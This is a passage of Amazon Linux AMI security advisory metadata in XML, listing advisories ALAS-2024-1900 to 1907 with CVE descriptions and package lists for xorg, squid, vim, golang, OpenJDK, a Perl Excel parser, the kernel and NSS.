arch="x86_64"><filename>Packages/kernel-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.334-177.552.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1900</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1900: important priority package update for xorg-x11-server</title><issued date="2024-01-03 22:37:00" /><updated date="2024-01-08 21:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-6478:
A flaw was found in xorg-server. A specially crafted request to RRChangeProviderProperty or RRChangeOutputProperty can trigger an integer overflow which may lead to a disclosure of sensitive information.
CVE-2023-6377:
A flaw was found in xorg-server. Querying or changing XKB button actions such as moving from a touchpad to a mouse can result in out-of-bounds memory reads and writes. This may allow local privilege escalation or possible remote code execution in cases where X11 forwarding is involved.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6377" title="" id="CVE-2023-6377" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6478" title="" id="CVE-2023-6478" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.54.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.54.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.54.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.54.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.54.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.54.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.54.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.54.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.54.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.54.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.54.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.54.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.54.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.54.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.54.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.54.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.54.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.54.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.54.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.54.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.54.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.54.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.54.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.54.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.54.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1901</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1901: important priority package update for squid</title><issued date="2024-01-03 22:37:00" /><updated date="2024-01-08 21:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-49285:
Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. Due to a Buffer Overread bug Squid is vulnerable to a Denial of Service attack against Squid HTTP Message processing. This bug is fixed by Squid version 6.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49285" title="" id="CVE-2023-49285" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.5.20" release="17.53.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.53.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.53.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.53.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.53.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.53.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.53.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.53.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.53.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.53.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.53.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1902</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1902: low priority package update for vim</title><issued date="2024-01-03 22:37:00" /><updated date="2024-01-08 21:22:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-48237:
Vim is an open source command line text editor. In affected versions when shifting lines in operator pending mode and using a very large value, it may be possible to overflow the size of integer. Impact is low, user interaction is required and a crash may not even happen in all situations. This issue has been addressed in commit `6bf131888` which has been included in version 9.0.2112. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVE-2023-48236:
Vim is an open source command line text editor. When using the z= command, the user may overflow the count with values larger
than MAX_INT. Impact is low, user interaction is required and a crash may not even happen in all situations. This vulnerability has been addressed in commit `73b2d379` which has been included in release version 9.0.2111. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVE-2023-48235:
Vim is an open source command line text editor. When parsing relative ex addresses one may unintentionally cause an
overflow. Ironically this happens in the existing overflow check, because the line number becomes negative and LONG_MAX - lnum will cause the overflow. Impact is low, user interaction is required and a crash may not even happen in all situations. This issue has been addressed in commit `060623e` which has been included in release version 9.0.2110. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVE-2023-48234:
Vim is an open source command line text editor. When getting the count for a normal mode z command, it may overflow for large counts given. Impact is low, user interaction is required and a crash may not even happen in all situations. This issue has been addressed in commit `58f9befca1` which has been included in release version 9.0.2109. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVE-2023-48233:
Vim is an open source command line text editor. If the count after the :s command is larger than what fits into a (signed) long variable, abort with e_value_too_large. Impact is low, user interaction is required and a crash may not even happen in all situations. This issue has been addressed in commit `ac6378773` which has been included in release version 9.0.2108. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVE-2023-48231:
Vim is an open source command line text editor. When closing a window, vim may try to access already freed window structure. Exploitation beyond crashing the application has not been shown to be viable. This issue has been addressed in commit `25aabc2b` which has been included in release version 9.0.2106. Users are advised to upgrade. There are no known workarounds for this vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48231" title="" id="CVE-2023-48231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48233" title="" id="CVE-2023-48233" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48234" title="" id="CVE-2023-48234" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48235" title="" id="CVE-2023-48235" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48236" title="" id="CVE-2023-48236" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48237" title="" id="CVE-2023-48237" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-data" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.2120-1.87.amzn1.noarch.rpm</filename></package><package name="vim-enhanced" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.2120-1.87.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.2120-1.87.amzn1.x86_64.rpm</filename></package><package name="xxd" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="x86_64"><filename>Packages/xxd-9.0.2120-1.87.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.2120-1.87.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.2120-1.87.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.2120-1.87.amzn1.x86_64.rpm</filename></package><package name="xxd" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="i686"><filename>Packages/xxd-9.0.2120-1.87.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.2120-1.87.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.2120-1.87.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.2120-1.87.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="9.0.2120" release="1.87.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.2120-1.87.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1903</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1903: medium priority package update for golang</title><issued date="2024-01-03 22:37:00" /><updated date="2024-01-08 21:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-45284:
path/filepath: recognize device names with trailing spaces and superscripts
The IsLocal function did not correctly detect reserved names in some cases:
- reserved names followed by spaces, such as "COM1 ".
- "COM" or "LPT" followed by a superscript 1, 2, or 3.
IsLocal now correctly reports these names as non-local.
CVE-2023-45283:
path/filepath: recognize \??\ as a Root Local Device path prefix.
On Windows, a path beginning with \??\ is a Root Local Device path equivalent
to a path beginning with \\?\. Paths with a \??\ prefix may be used to
access arbitrary locations on the system. For example, the path \??\c:\x
is equivalent to the more common path c:\x.
The filepath package did not recognize paths with a \??\ prefix as special.
Clean could convert a rooted path such as \a\..\??\b into
the root local device path \??\b. It will now convert this
path into .\??\b.
IsAbs did not report paths beginning with \??\ as absolute.
It now does so.
VolumeName now reports the \??\ prefix as a volume name.
Join(`\`, `??`, `b`) could convert a seemingly innocent
sequence of path elements into the root local device path
\??\b. It will now convert this to \.\??\b.
CVE-2023-39326:
A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body. A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request. Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39326" title="" id="CVE-2023-39326" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45283" title="" id="CVE-2023-45283" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45284" title="" id="CVE-2023-45284" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-misc" version="1.20.12" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.20.12-1.49.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.20.12" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.20.12-1.49.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.20.12" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.20.12-1.49.amzn1.x86_64.rpm</filename></package><package name="golang-shared" version="1.20.12" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.20.12-1.49.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.20.12" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.20.12-1.49.amzn1.noarch.rpm</filename></package><package name="golang-docs" version="1.20.12" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.20.12-1.49.amzn1.noarch.rpm</filename></package><package name="golang" version="1.20.12" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.20.12-1.49.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.20.12" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.20.12-1.49.amzn1.i686.rpm</filename></package><package name="golang-shared" version="1.20.12" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.20.12-1.49.amzn1.i686.rpm</filename></package><package name="golang" version="1.20.12" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.20.12-1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1904</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1904: medium priority package update for java-1.8.0-openjdk</title><issued date="2024-01-03 22:37:00" /><updated date="2024-01-08 21:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-22081:
Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK product of Oracle Java SE (component: JSSE). Supported versions that are affected are Oracle Java SE: 8u381, 8u381-perf, 11.0.20, 17.0.8, 20.0.2; Oracle GraalVM for JDK: 17.0.8 and 20.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Java SE, Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM for JDK. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2023-22067:
Vulnerability in Oracle Java SE (component: CORBA). Supported versions that are affected are Oracle Java SE: 8u381 and 8u381-perf. Easily exploitable vulnerability allows unauthenticated attacker with network access via CORBA to compromise Oracle Java SE. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22067" title="" id="CVE-2023-22067" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22081" title="" id="CVE-2023-22081" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-src" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.392.b08-2.82.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.392.b08-2.82.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.392.b08-2.82.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.392.b08-2.82.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.392.b08-2.82.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.392.b08-2.82.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.392.b08-2.82.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.392.b08-2.82.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.392.b08-2.82.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.392.b08-2.82.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.392.b08-2.82.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.392.b08-2.82.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.392.b08-2.82.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.392.b08" release="2.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.392.b08-2.82.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1905</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1905: important priority package update for perl-Spreadsheet-ParseExcel</title><issued date="2024-01-19 01:19:00" /><updated date="2024-01-23 18:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-7101:
Spreadsheet::ParseExcel version 0.65 is a Perl module used for parsing Excel files. Spreadsheet::ParseExcel is vulnerable to an arbitrary code execution (ACE) vulnerability due to passing unvalidated input from a file into a string-type "eval". Specifically, the issue stems from the evaluation of Number format strings (not to be confused with printf-style format strings) within the Excel parsing logic.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7101" title="" id="CVE-2023-7101" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-Spreadsheet-ParseExcel" version="0.5900" release="5.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Spreadsheet-ParseExcel-0.5900-5.3.amzn1.x86_64.rpm</filename></package><package name="perl-Spreadsheet-ParseExcel" version="0.5900" release="5.3.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Spreadsheet-ParseExcel-0.5900-5.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1906</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1906: important priority package update for kernel</title><issued date="2024-01-19 01:19:00" /><updated date="2024-01-23 18:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-6606:
An out-of-bounds read vulnerability was found in smbCalcSize in fs/smb/client/netmisc.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6606" title="" id="CVE-2023-6606" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.336" release="178.554.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.336-178.554.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.336-178.554.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.336" release="178.554.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.336-178.554.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1907</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1907: medium priority package update for nss-softokn</title><issued date="2024-01-19 01:19:00" /><updated date="2024-01-23 18:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-5388:
It was discovered that the numerical library used in NSS for RSA cryptography leaks information whether high order bits of the RSA decryption result are zero. This information can be used to mount a Bleichenbacher or Manger like attack against all RSA decryption operations. As the leak happens before any padding operations, it affects all padding modes: PKCS#1 v1.5, OAEP, and RSASVP. Both API level calls and TLS server operation are affected.
